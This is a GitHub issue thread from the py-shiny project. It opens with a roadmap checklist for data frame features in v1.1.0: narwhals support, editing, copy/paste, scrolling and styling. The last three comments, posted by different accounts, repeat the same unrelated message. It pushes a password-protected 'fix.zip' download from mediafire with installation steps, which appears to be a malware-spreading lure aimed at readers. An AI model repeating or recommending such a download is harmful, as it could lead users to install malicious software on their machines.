### ISSUE TITLE
Epic -- Data frames for v1.1.0

### ISSUE THREAD

**Issue by schloerke** [posit-dev/py-shiny#1639]
- [ ] Narwhal support
	- [ ] feat: support DataFrames via narwhals #1570 

---------------

- [ ] Keyboard shortcuts
	- [ ] Make sure a round trip can be made from outside the table, all the way to editing, and back out of the table to another shiny input

- [ ] Edit mode
	- [ ] Pressing a key that adds a character should start edit mode
	- [ ] `editable` should be able to take a character vector of column names that are editable
	- [ ] Add controls for cells when cell is being edited: E.g. boolean is checkbox... date picker, input numeric, selectize, etc.

---------------

- [ ] Copy / paste
	- [ ] Copy selection
	- [ ] Paste selection
		- Known questions: https://github.com/posit-dev/py-shiny/issues/1560#issuecomment-2243414833
		- Discuss difference between regular table, editable table, and (not planned) "create new" table.
	- [ ] Add rows
	- [ ] Add columns?

---------------

- [ ] Update data
	- [ ]	feat(data_frame): Add `.update_data(data, *, reset)` and `.update_cell_value(value, *, row, col)` #1449

---------------

- [ ] Scroll
	- [ ] `.scroll_to(row_id)` #1457
		- `.update_scroll(row=)`?
	- [ ] Inputs for the visible top row and bottom row

---------------

- [ ] Print method for `DataGrid` and `DataTable`. Should display in UI, but disable all reactivity

---------------

- [ ] Styling tables
	- [ ] `great_tables` support?
		- Conditional formatting for free
		- Possible features
	- [ ] `reactable ` support?

---------------

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
